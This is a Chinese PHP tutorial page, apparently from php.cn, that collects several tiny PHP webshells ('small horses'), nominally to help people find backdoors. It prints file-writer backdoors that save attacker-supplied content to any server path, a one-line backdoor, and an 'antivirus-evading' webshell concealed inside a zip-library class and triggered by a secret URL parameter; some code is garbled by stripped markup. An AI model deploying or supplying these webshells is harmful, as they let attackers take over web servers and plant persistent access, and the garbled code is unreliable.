简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Home > php教程 > php手册 > body text

超小PHP小马小结(方便查找后门的朋友)

WBOY
Release: 2016-06-13 12:01:03
Original
1741 people have browsed it

作者: spider
我也来个超小PHP小马

复制代码 代码如下:


header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>


保存文件名:









if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';
@fclose($fp);
}
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。

复制代码 代码如下:



By: SinCoder
php小马 By:SinCoder
echo "本程序的路径: ".__FILE__.
"服务器操作系统: ".PHP_OS.
"服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]).
"PHP版本: ".PHP_VERSION;
?>
method="post">
要提交的数据:


保存路径:





if(!(isset($_POST["data"]) && isset($_POST["dir"])))
exit();
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0)
{
$p_File=fopen($_POST["dir"],"a");
if(!$p_File)
echo "写入失败!请换个目录试试!";
else
echo "Ok!! ";
fputs($p_File,$_POST["data"]);
fclose($p_File);
}
else
echo "请把数据填写完整!";
?>

php一句话小马的后门

复制代码 代码如下:


)?>


这样访问之后,在当前目录生成jb51.php 内容为 )?> 的一句话小马,密码为 jb51
最新免杀php小马

复制代码 代码如下:


class zip
{
var $datasec, $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0; var $dirs = Array(".");
function get_List($zip_name)
{
$ret = '';
$zip = @fopen($zip_name, 'rb');
if(!$zip) return(0);
$centd = $this->ReadCentralDir($zip,$zip_name);
@rewind($zip);
@fseek($zip, $centd['offset']);
for ($i=0; $i{
$header = $this->ReadCentralFileHeaders($zip);
$header['index'] = $i;$info['filename'] = $header['filename'];
$info['stored_filename'] = $header['stored_filename'];
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size'];
$info['crc'] = strtoupper(dechex( $header['crc'] ));
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment'];
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0;
$info['index'] = $header['index'];$info['status'] = $header['status'];
$ret[]=$info; unset($header);
}
return $ret;
}
function Add($files,$compact)
{
if(!is_array($files[0])) $files=Array($files);
for($i=0;$files[$i];$i++){
$fn = $files[$i];
if(!in_Array(dirname($fn[0]),$this->dirs))
$this->add_Dir(dirname($fn[0]));
if(basename($fn[0]))
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact);
}
return $ret;
}
function get_file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return $data . $ctrldir . $this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
function add_dir($name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name;
$this -> ctrl_dir[] = $cdrec;
$this -> old_offset = $new_offset;
$this -> dirs[] = $name;
}
function add_File($data, $name, $compact = 1)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
if($compact)
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime;
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime;
$unc_len = strlen($data); $crc = crc32($data);
if($compact){
$zdata = gzcompress($data); $c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
}else{
$zdata = $data;
}
$c_len=strlen($zdata);
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata;
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
if($compact)
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00";
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 );
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
return true;
}
function DosTime() {
$timearray = getdate();
if ($timearray['year'] $timearray['year'] = 1980; $timearray['mon'] = 1;
$timearray['mday'] = 1; $timearray['hours'] = 0;
$timearray['minutes'] = 0; $timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) ($timearray['minutes'] > 1);
}
//解压整个压缩包
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract
function ExtractAll ( $zn, $to)
{
if(substr($to,-1)!="/") $to .= "/";
$files = $this->get_List($zn);
$cn = count($files);
if(is_array($files))
{
for($i=0;$i{
if($files[$i]['folder']==1){
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']);
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']);
}
}
}
$this->Extract ($zn,$to);
}
function Extract ( $zn, $to, $index = Array(-1) )
{
$ok = 0; $zip = @fopen($zn,'rb');
if(!$zip) return(-1);
$cdir = $this->ReadCentralDir($zip,$zn);
$pos_entry = $cdir['offset'];
if(!is_array($index)){ $index = array($index); }
for($i=0; isset($index[$i]);$i++){
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
return(-1);
}
for ($i=0; $i{
@fseek($zip, $pos_entry);
$header = $this->ReadCentralFileHeaders($zip);
$header['index'] = $i; $pos_entry = ftell($zip);
@rewind($zip); fseek($zip, $header['offset']);
if(in_array("-1",$index)||in_array($i,$index))
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
}
fclose($zip);
return $stat;
}
function ReadFileHeader($zip)
{
$binary_data = fread($zip, 30);
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
$header['filename'] = fread($zip, $data['filename_len']);
if ($data['extra_len'] != 0) {
$header['extra'] = fread($zip, $data['extra_len']);
} else { $header['extra'] = ''; }
$header['compression'] = $data['compression'];$header['size'] = $data['size'];
$header['compressed_size'] = $data['compressed_size'];
$header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
if ($header['mdate'] && $header['mtime']){
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
}else{$header['mtime'] = time();}
$header['stored_filename'] = $header['filename'];
$header['status'] = "ok";
return $header;
}
function ReadCentralFileHeaders($zip){
$binary_data = fread($zip, 46);
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
if ($header['filename_len'] != 0)
$header['filename'] = fread($zip,$header['filename_len']);
else $header['filename'] = '';
if ($header['extra_len'] != 0)
$header['extra'] = fread($zip, $header['extra_len']);
else $header['extra'] = '';
if ($header['comment_len'] != 0)
$header['comment'] = fread($zip, $header['comment_len']);
else $header['comment'] = '';
if ($header['mdate'] && $header['mtime'])
{
$hour = ($header['mtime'] & 0xF800) >> 11;
$minute = ($header['mtime'] & 0x07E0) >> 5;
$seconde = ($header['mtime'] & 0x001F)*2;
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
$month = ($header['mdate'] & 0x01E0) >> 5;
$day = $header['mdate'] & 0x001F;
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
} else {
$header['mtime'] = time();
}
$header['stored_filename'] = $header['filename'];
$header['status'] = 'ok';
if (substr($header['filename'], -1) == '/')
$header['external'] = 0x41FF0010;
return $header;
}
function ReadCentralDir($zip,$zip_name)
{
$size = filesize($zip_name);
if ($size else $maximum_size=277;
@fseek($zip, $size-$maximum_size);
$pos = ftell($zip); $bytes = 0x00000000;
while ($pos {
$byte = @fread($zip, 1); $bytes=($bytes if ($bytes == 0x504b0506){ $pos++; break; } $pos++;
}
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18));
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
$centd['disk_entries'] = $data['disk_entries'];
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
$centd['size'] = $data['size']; $centd['disk'] = $data['disk'];
return $centd;
}
function ExtractFile($header,$to,$zip)
{
$header = $this->readfileheader($zip);
$header['external'] = (!isset($header['external']) ? 0 : $header['external']);
if(substr($to,-1)!="/") $to.="/";
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']);
if (!($header['external']==0x41FF0010)&&!($header['external']==16))
{
if ($header['compression']==0)
{
$fp = @fopen($to.$header['filename'], 'wb');
if(!$fp) return(-1);
$size = $header['compressed_size'];
while ($size != 0)
{
$read_size = ($size $buffer = fread($zip, $read_size);
$binary_data = pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
fclose($fp);
touch($to.$header['filename'], $header['mtime']);
}else{
$fp = @fopen($to.$header['filename'].'.gz','wb');
if(!$fp) return(-1);
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
Chr(0x00), time(), Chr(0x00), Chr(3));
fwrite($fp, $binary_data, 10);
$size = $header['compressed_size'];
while ($size != 0)
{
$read_size = ($size $buffer = fread($zip, $read_size);
$binary_data = pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
$binary_data = pack('VV', $header['crc'], $header['size']);
fwrite($fp, $binary_data,8); fclose($fp);
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
if(!$gzp) return(-2);
$fp = @fopen($to.$header['filename'],'wb');
if(!$fp) return(-1);
$size = $header['size'];
while ($size != 0)
{
$read_size = ($size $buffer = gzread($gzp, $read_size);
$binary_data = pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
fclose($fp); gzclose($gzp);
touch($to.$header['filename'], $header['mtime']);
@unlink($to.$header['filename'].'.gz');
}}
return true;
}
}
if($_GET['zxzgcn']=='login'){
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>


save to:









if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!';
@fclose($fp);
}
}
?>

用法xxx.php?zxzgcn=login
Related labels:
php spider code author copy pony friend Find of
source:php.cn
Previous article:PHP原生模板引擎 最简单的模板引擎 Next article:PHP是什么?PHP主要数据类型有哪些?
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Move the content to the left by adding the Width property I have provided margins to the body. main {left margin: 200px; right margin: 200px; text a...
From 2024-04-06 22:01:35
0
3
816
The query and formula form the entire table, with new columns, where the new columns are formulas involving other conditional column values EDIT: The formula should be the "value" column - the "value" column wi...
From 2024-04-06 21:23:40
0
2
530
Scatterplot points do not maintain values ​​when zooming in d3.js This is my first time using d3.js, so please bear with me. I implemented it as pure JavaSc...
From 2024-04-06 18:16:26
0
1
403
CSS bottom border on navigation bar I have a navigation bar and I have added a red line at the bottom when any item in the lis...
From 2024-04-06 15:04:41
0
2
347
React Three Fiber: Why are my scroll events lagging? In ReactThreeFiber, I have a React component that generates a sprite that I want to persis...
From 2024-04-06 13:39:24
0
1
410
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!